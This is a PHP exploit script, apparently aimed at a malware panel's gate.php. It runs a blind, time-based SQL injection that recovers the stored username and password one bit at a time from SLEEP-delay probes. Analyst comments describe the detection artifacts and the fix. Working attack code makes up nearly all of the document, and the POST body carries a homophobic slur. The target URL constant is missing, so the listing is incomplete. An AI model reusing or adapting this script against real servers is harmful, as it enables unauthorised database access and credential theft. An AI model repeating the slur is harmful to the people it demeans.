<?php
// Panel.zip hash: c49c74a609b24284a0a66fc008c4d8f2
// Start with PHP CLI (php pwn.php)
//
// Analyst summary: this script is a blind, time-based SQL injection client
// against a panel's gate.php. Every probe is a full HTTP POST and the only
// signal it reads back is response latency (see is_true()), so the
// server-side artifacts are a burst of POSTs to gate.php whose `i` query
// parameter carries "UNION SELECT ... SLEEP(" text, all sent with the same
// hard-coded User-Agent (see post_request()). The server-side remedy is a
// parameterised query for the `i` parameter.

set_time_limit(0);

// Adjust this :)
// NOTE(review): URL is used below but is not defined anywhere in this
// listing; a define('URL', ...) was presumably removed -- TODO confirm.
define('SLEEP_TIME', '4'); // seconds handed to SQL SLEEP() in each probe (kept as a string, it is concatenated into the query text)
define('PAGE_TIME', 4);    // seconds; a response that takes at least this long is treated as "condition true"

echo('attacking ' . URL . PHP_EOL);
get_string('username');
get_string('password');

/**
 * Find the length of settings.value for the given settings.key by probing
 * LENGTH(value) = 1, 2, 3, ... until the probe is judged true.
 *
 * Each probe only triggers SLEEP() when the length matches, so the loop
 * exits on the first length whose response is slow. There is no upper
 * bound: the loop only terminates when some probe is judged true.
 *
 * @param string $field  settings.key to look up (concatenated into the query verbatim)
 * @return int           recovered length
 */
function get_length($field) {
    $length = 1;
    while (!is_true("' UNION SELECT ALL 1,2,3,4,5,6,7 FROM `settings` WHERE `key` = '" . $field . "' AND (NOT (LENGTH(value)=" . $length . ") OR SLEEP(" . SLEEP_TIME . "))-- ")) {
        ++$length;
    }
    echo($field . ' length: ' . $length . PHP_EOL);
    return $length;
}

/**
 * Recover settings.value for the given key character by character.
 *
 * Prints the partial result after every character, padding the not-yet-
 * recovered tail with '*'.
 *
 * @param string $field  settings.key to read
 * @return string        recovered value
 */
function get_string($field) {
    $length = get_length($field);
    $str = '';
    for ($i = 0; $i < $length; ++$i) {
        $str .= chr(get_char($field, $i));
        echo($field . ' : ' . str_pad($str, $length, '*') . PHP_EOL);
    }
    return $str;
}

/**
 * Recover one byte of settings.value at 0-based position $id.
 *
 * Bits 1, 2, 4, ..., 64 are each probed with ORD(SUBSTR(value, id+1, 1)) & bit;
 * the result string is assembled most-significant-bit first by prepending.
 * Bit 128 is never probed and is assumed 0, so only 7-bit (ASCII) values
 * can be recovered correctly.
 *
 * @param string $field  settings.key to read
 * @param int    $id     0-based character index (SUBSTR is 1-based, hence $id + 1)
 * @return int           recovered byte value
 */
function get_char($field, $id) {
    $binary = '';
    for ($i = 1; $i < 256; $i *= 2) {
        if ($i == 128)
            $binary = '0' . $binary;
        else
            $binary = (is_true("' UNION SELECT ALL 1,2,3,4,5,6,7 FROM `settings` WHERE `key` = '" . $field . "' AND (NOT (ORD(SUBSTR(`value`," . ($id + 1) . ",1)) & " . $i . ") OR SLEEP(" . SLEEP_TIME . "))-- ") ? '1' : '0') . $binary;
    }
    return bindec($binary);
}

/**
 * The timing oracle: send one probe and report whether the server was slow.
 *
 * The POST body is a 4-byte RC4 key sent in the clear followed by the
 * RC4-encrypted fields u/d/b -- presumably the panel's expected check-in
 * format, which is why the request is accepted at all (TODO confirm).
 * The injected text is URL-encoded and appended to the `i` query parameter.
 *
 * Returns true when the measured request time is >= PAGE_TIME. Note that
 * the time is measured around curl_exec() regardless of outcome, so a
 * timed-out or otherwise slow response is also counted as true; the
 * oracle is latency only, never response content.
 *
 * @param string $query  SQL fragment to inject
 * @return bool
 */
function is_true($query) {
    $rc4_key = 'aaaa';
    // b d u
    $data = 'u=tapz&d=faggot&b=lol';
    $encode = rc4($rc4_key, $data, strlen($data), strlen($rc4_key));
    $encode = $rc4_key . $encode;
    $injection = urlencode($query);
    $req = post_request(URL . 'gate.php?i=127.0.0.1' . $injection, $encode);
    return !($req['time'] < PAGE_TIME);
}

/**
 * POST $data to $url with curl and time the round trip.
 *
 * Detection note: the User-Agent below is a fixed literal and is identical
 * on every probe, and each probe is a separate connection (a new handle per
 * call, closed afterwards). The 30-second CURLOPT_TIMEOUT bounds a single
 * probe; a timeout still yields a 'time' of roughly 30 s and 'page' === false.
 *
 * @param string $url
 * @param string $data  raw POST body
 * @return array{page: string|false, time: float}  response body and elapsed seconds
 */
function post_request($url, $data) {
    $handle = curl_init($url);
    curl_setopt($handle, CURLOPT_HEADER, false);
    curl_setopt($handle, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1667.0 Safari/537.36');
    curl_setopt($handle, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($handle, CURLOPT_POST, true);
    curl_setopt($handle, CURLOPT_POSTFIELDS, $data);
    curl_setopt($handle, CURLOPT_TIMEOUT, 30);
    $time = microtime(true);
    $page = curl_exec($handle);
    $time = microtime(true) - $time;
    curl_close($handle);
    return array(
        'page' => $page,
        'time' => $time
    );
}

/**
 * Plain RC4 (KSA + PRGA), used here only to produce the request body the
 * panel expects. RC4 is not a secure cipher; its presence is a property of
 * the protocol being spoken, not a design choice of this script.
 *
 * @param string $pwd          key bytes
 * @param string $data         plaintext (or ciphertext; RC4 is symmetric)
 * @param int    $data_length  number of bytes of $data to process
 * @param int    $pwd_length   number of key bytes to cycle through
 * @return string              keystream XOR $data, same length as $data_length
 */
function rc4($pwd, $data, $data_length, $pwd_length){
    // Initialise as arrays; element 0 ('') is overwritten by the first loop iteration.
    $key[] = '';
    $box[] = '';
    $cipher = '';
    // Key-scheduling: expand the key cyclically to 256 entries and seed the S-box.
    for ($i = 0; $i < 256; $i++) {
        $key[$i] = ord($pwd[$i % $pwd_length]);
        $box[$i] = $i;
    }
    for ($j = $i = 0; $i < 256; $i++) {
        $j = ($j + $box[$i] + $key[$i]) % 256;
        $tmp = $box[$i];
        $box[$i] = $box[$j];
        $box[$j] = $tmp;
    }
    // Keystream generation: one swap per input byte, XOR with the selected S-box entry.
    for ($a = $j = $i = 0; $i < $data_length; $i++) {
        $a = ($a + 1) % 256;
        $j = ($j + $box[$a]) % 256;
        $tmp = $box[$a];
        $box[$a] = $box[$j];
        $box[$j] = $tmp;
        $k = $box[(($box[$a] + $box[$j]) % 256)];
        $cipher .= chr(ord($data[$i]) ^ $k);
    }
    return $cipher;
}